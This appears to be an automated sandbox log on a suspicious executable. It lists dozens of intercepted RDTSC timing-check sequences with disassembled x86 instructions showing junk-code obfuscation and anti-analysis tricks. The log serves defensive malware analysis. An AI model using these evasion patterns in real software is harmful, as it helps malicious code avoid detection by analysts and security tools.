Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F2DBD second address: 8F2DCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F2DCB second address: 8F2DCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F2DCF second address: 8F2DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F2DD5 second address: 8F2E4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F5F64D1DF18h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebp 0x00000029 call 00007F5F64D1DF18h 0x0000002e pop ebp 0x0000002f mov dword ptr [esp+04h], ebp 0x00000033 add dword ptr [esp+04h], 00000014h 0x0000003b inc ebp 0x0000003c push ebp 0x0000003d ret 0x0000003e pop ebp 0x0000003f ret 0x00000040 jmp 00007F5F64D1DF1Dh 0x00000045 push 00000000h 0x00000047 mov di, si 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d push ecx 0x0000004e jp 00007F5F64D1DF16h 0x00000054 pop ecx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F3D7E second address: 8F3DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5F64D1DAB6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push esi 0x0000000e je 00007F5F64D1DAB8h 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 nop 0x00000018 pushad 0x00000019 mov dword ptr [ebp+122D1B00h], esi 0x0000001f clc 0x00000020 popad 0x00000021 push 00000000h 0x00000023 xor dword ptr [ebp+12483267h], eax 0x00000029 push 00000000h 0x0000002b movsx ebx, ax 0x0000002e push eax 0x0000002f jo 00007F5F64D1DACDh 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F5DA4 second address: 8F5DAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F5DAD second address: 8F5DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F5DB8 second address: 8F5DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B06C5 second address: 8B06D6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F5F64D1DAB8h 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B06D6 second address: 8B06E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B06E1 second address: 8B06E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B06E5 second address: 8B06FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007F5F64D1DF16h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007F5F64D1DF16h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F631C second address: 8F6395 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5F64D1DACFh 0x00000008 jmp 00007F5F64D1DAC9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 je 00007F5F64D1DABCh 0x00000016 mov dword ptr [ebp+12450B5Eh], edx 0x0000001c push 00000000h 0x0000001e add dword ptr [ebp+122D3055h], eax 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push edx 0x00000029 call 00007F5F64D1DAB8h 0x0000002e pop edx 0x0000002f mov dword ptr [esp+04h], edx 0x00000033 add dword ptr [esp+04h], 0000001Ch 0x0000003b inc edx 0x0000003c push edx 0x0000003d ret 0x0000003e pop edx 0x0000003f ret 0x00000040 mov ebx, edi 0x00000042 xchg eax, esi 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 jmp 00007F5F64D1DAC2h 0x0000004b push eax 0x0000004c pop eax 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F6395 second address: 8F639B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F639B second address: 8F639F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F8390 second address: 8F8396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F7633 second address: 8F7638 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F84FB second address: 8F8501 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F8501 second address: 8F8586 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jc 00007F5F64D1DAC4h 0x00000012 jmp 00007F5F64D1DABEh 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007F5F64D1DAB8h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 mov bx, dx 0x00000035 push dword ptr fs:[00000000h] 0x0000003c push edi 0x0000003d movsx edi, ax 0x00000040 pop edi 0x00000041 mov dword ptr fs:[00000000h], esp 0x00000048 mov edi, ecx 0x0000004a mov eax, dword ptr [ebp+122D13C1h] 0x00000050 add bl, 00000032h 0x00000053 push FFFFFFFFh 0x00000055 mov dword ptr [ebp+122D1878h], eax 0x0000005b nop 0x0000005c jc 00007F5F64D1DAC8h 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F5F64D1DABAh 0x00000069 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8F8586 second address: 8F85A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F5F64D1DF27h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8FA405 second address: 8FA409 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8FA409 second address: 8FA42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5F64D1DF29h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8A32C1 second address: 8A32C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8A32C5 second address: 8A3307 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5F64D1DF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007F5F64D1DF27h 0x00000010 jmp 00007F5F64D1DF1Ch 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5F64D1DF1Fh 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8FDAEF second address: 8FDAF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8FFA36 second address: 8FFA40 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 900A67 second address: 900A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8FDCFE second address: 8FDD02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 901B64 second address: 901B7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5F64D1DAC5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 901B7E second address: 901BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F5F64D1DF18h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov bh, 08h 0x00000026 push 00000000h 0x00000028 add edi, dword ptr [ebp+122D19D0h] 0x0000002e push 00000000h 0x00000030 or ebx, 0894BF9Bh 0x00000036 xchg eax, esi 0x00000037 jmp 00007F5F64D1DF1Fh 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 je 00007F5F64D1DF16h 0x00000046 jnp 00007F5F64D1DF16h 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8FFC4C second address: 8FFC5E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5F64D1DAB8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8FFC5E second address: 8FFC68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8FFC68 second address: 8FFC6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 902C4A second address: 902C4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 902C4E second address: 902C54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 902C54 second address: 902C5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 901D78 second address: 901D9C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F5F64D1DAC3h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F5F64D1DAB8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 901EBB second address: 901EC1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 903ADD second address: 903AE2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 903AE2 second address: 903AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 90E15E second address: 90E164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 90D879 second address: 90D8AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 jg 00007F5F64D1DF16h 0x0000000c pop edx 0x0000000d popad 0x0000000e pushad 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 jo 00007F5F64D1DF16h 0x00000018 pop ecx 0x00000019 push edi 0x0000001a pushad 0x0000001b popad 0x0000001c pop edi 0x0000001d jng 00007F5F64D1DF28h 0x00000023 jmp 00007F5F64D1DF1Ch 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 90D9E8 second address: 90D9EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 90D9EC second address: 90D9F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 90D9F6 second address: 90D9FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 90DCDE second address: 90DCE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9110F7 second address: 9110FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9110FD second address: 911113 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007F5F64D1DF16h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007F5F64D1DF16h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 911113 second address: 91114E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d popad 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5F64D1DAC6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91114E second address: 911175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F5F64D1DF21h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007F5F64D1DF16h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91132F second address: 911333 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 911333 second address: 911351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5F64D1DF23h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 911351 second address: 911380 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5F64D1DAC5h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F5F64D1DABCh 0x00000019 jne 00007F5F64D1DAB6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 911380 second address: 91138A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F5F64D1DF16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 911451 second address: 91145B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5F64D1DAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91145B second address: 91148C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5F64D1DF22h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91148C second address: 911492 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 918082 second address: 918086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 89FD09 second address: 89FD16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edi 0x00000006 pop edi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 916D95 second address: 916D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 916D9B second address: 916DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5F64D1DAC1h 0x0000000a jmp 00007F5F64D1DAC7h 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 916DCE second address: 916DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 916DD2 second address: 916DD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917923 second address: 91792D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5F64D1DF1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 89FCFD second address: 89FD16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5F64D1DABCh 0x0000000a push eax 0x0000000b push edi 0x0000000c pop edi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917A5F second address: 917A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jno 00007F5F64D1DF16h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917A71 second address: 917AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F5F64D1DAC6h 0x00000010 push esi 0x00000011 pop esi 0x00000012 jmp 00007F5F64D1DABEh 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F5F64D1DAC4h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917AA7 second address: 917AAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917AAD second address: 917AB4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917AB4 second address: 917ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917ABD second address: 917AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5F64D1DAC4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917AD5 second address: 917AD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917AD9 second address: 917ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917C56 second address: 917C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917F08 second address: 917F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5F64D1DAB6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917F16 second address: 917F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5F64D1DF16h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917F24 second address: 917F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 917F29 second address: 917F30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91BB01 second address: 91BB1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F5F64D1DAB6h 0x00000009 pushad 0x0000000a popad 0x0000000b js 00007F5F64D1DAB6h 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007F5F64D1DAB6h 0x0000001c rdtsc
